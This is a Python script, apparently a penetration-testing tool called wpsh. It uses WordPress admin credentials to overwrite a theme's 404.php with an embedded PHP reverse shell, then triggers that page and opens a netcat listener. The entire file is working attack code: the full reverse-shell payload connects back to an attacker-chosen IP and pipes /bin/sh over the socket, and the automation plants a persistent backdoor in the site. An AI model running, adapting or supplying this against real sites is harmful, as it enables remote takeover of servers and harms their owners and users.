#!/usr/bin/env python3

################################################################################
#                                                                              #
# Copyright (C) 2024 Brunk (Anas)                                              #
#                                                                              #
# wpsh v1.0.0  -  WordPress reverse shell exploit                              #
#                                                                              #
#                                                                              #
# GNU GENERAL PUBLIC LICENSE                                                   #
#                                                                              #
# This program is free software: you can redistribute it and/or modify         #
# it under the terms of the GNU General Public License as published by         #
# the Free Software Foundation, either version 3 of the License, or            #
# (at your option) any later version.                                          #
#                                                                              #
# This program is distributed in the hope that it will be useful,              #
# but WITHOUT ANY WARRANTY; without even the implied warranty of               #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                #
# GNU General Public License for more details.                                 #
#                                                                              #
# You should have received a copy of the GNU General Public License            #
# along with this program.  If not, see <http://www.gnu.org/licenses/>.        #
#                                                                              #
################################################################################

from time import sleep
from os import system
import threading
import requests
import re

from pwn import log
import argparse

# General constants
SESSION = requests.Session()
THEME = ""
TRIGGER_PAGE = ""
PORT = 0

# Copied from here: https://github.com/pentestmonkey/php-reverse-shell/
PAYLOAD = """
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'CHANGEIP';  // CHANGE THIS
$port = CHANGEPORT;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
?> 
"""


def banner():
    """
        Display the script banner
    """
    print("""\x1b[33m
 __      ____________      .__     
/  \\    /  \\______   \\_____|  |__  
\\   \\/\\/   /|     ___/  ___/  |  \\ 
 \\        / |    |   \\___ \\|   Y  \\
  \\__/\\  /  |____|  /____  >___|  /
       \\/                \\/     \\/              
\x1b[0m   \x1b[1m\x1b[33m   
=[ WordPress reverse shell exploit 
=[ NullBrunk
\x1b[0m
""")


def parse_args() -> tuple:
    """
        Parses the CLI given arguments
        Returns the wordpress URL, admin's username and admin's password
    """

    parser = argparse.ArgumentParser(description="Get reverse shell from WordPress website")
    parser.add_argument("-u", help="URL to the WordPress site", metavar="URL", required=True)
    parser.add_argument("-au", help="WordPress admin username", metavar="ADMIN_USER", required=True)
    parser.add_argument("-ap", help="WordPress admin password", metavar="ADMIN_PASS", required=True)
    
    parser.add_argument("-i", help="Local ip for the reverse shell", metavar="IP", required=True)
    parser.add_argument("-p", help="Local port for the reverse shell", metavar="PORT", required=True, type=int)
    args = parser.parse_args()

    if(not args.u.startswith("http")):
        log.error("Missing schema (http:// | https://)")
        log.info("Adding http:// ...")
        args.u = "http://" + args.u

    if(not args.u.endswith("/")):
        args.u += "/"

    # Update the payload and the port variables
    global PAYLOAD, PORT
    PAYLOAD = PAYLOAD.replace("CHANGEIP", args.i).replace("CHANGEPORT", str(args.p))
    PORT = args.p

    return args.u, args.au, args.ap


def extract_value(input: str) -> str:
    """
        Extract the value from the input's value attribute
    """

    return input.split("value=")[1].split('"')[1]


def authenticate(target :str, wp_user: str, wp_pass: str) -> None:
    """
    Attempt to authenticate with the given credentials
    """

    log.info(f"Attempting to authenticate")

    SESSION.post(f"{target}wp-login.php", data = {
        "log": wp_user,
        "pwd": wp_pass,
        "wp-submit": "Submit"
    })

    if(len(SESSION.cookies) <= 1):
        log.critical("Failed to authenticate")
        exit()
    
    log.success(f"Authentication succeeded")


def get_edition_page(target) -> str:
    """
        Returns the link to the 404.php edit page
    """

    pages_url = SESSION.get(f"{target}wp-admin/theme-editor.php").text
    try:
        unparsed_url = re.findall(".*404.php.*", pages_url)[0]
    except IndexError:
        log.critical("404.php not found")
        exit()
    
    editable = unparsed_url.split('"')[1]
    log.success("Found 404.php at /" + editable.replace(target, ""))

    return editable


def upload_reverse_shell(target: str, link: str) -> None:
    """
        Uploads the reverse shell by editing the 404.php theme file and replacing it 
        by the Pentestmonkey PHP reverse shell.
    """
    
    content = SESSION.get(link).text

    hidden_inputs = re.findall('<input type="hidden" .*?/>', content)

    global THEME, TRIGGER_PAGE
    THEME = extract_value(hidden_inputs[4])
    TRIGGER_PAGE = extract_value(hidden_inputs[3])
    data = {
        "nonce": extract_value(hidden_inputs[0]),
        "_wp_http_referer": extract_value(hidden_inputs[1]),
        "newcontent": PAYLOAD,
        "action": "edit-theme-plugin-file",
        "file": TRIGGER_PAGE,
        "theme": THEME,
        "docs-list": "",
    }
    if(not '"success":true' in SESSION.post(f"{target}wp-admin/admin-ajax.php", data=data).text):
        log.critical("Could not edit the 404.php page")
        exit()
    log.success(f"Successfully uploaded the reverse shell")


def trigger_backdoor(target: str):
    """
        Trigger the reverse shell by sending a GET request to the 404.php page
    """
    
    log.info("Triggering the reverse shell ...")

    # Wait for the netcat listener to start listening
    sleep(1)

    # Trigger the reverse shell
    trigger_url = f"{target}wp-content/themes/{THEME}/{TRIGGER_PAGE}"
    log.info("GET " + trigger_url + "\n\n")
    SESSION.get(trigger_url)


def main(target: str, wp_user: str, wp_pass: str) -> None:
    
    authenticate(target, wp_user, wp_pass)

    editable = get_edition_page(target)

    upload_reverse_shell(target, editable)

    # We need to launch the triggerer first, and only then launch the listener. 
    # Therefore, the triggerer needs to wait a little before triggering the backdoor.
    
    # Triggerrer
    x = threading.Thread(target=trigger_backdoor, args=(target,), daemon=True)
    x.start()
    
    # Listener
    system(f"nc -nlp {PORT}")



if __name__ == "__main__":
    banner()

    target, wp_user, wp_pass = parse_args()
    main(target, wp_user, wp_pass)
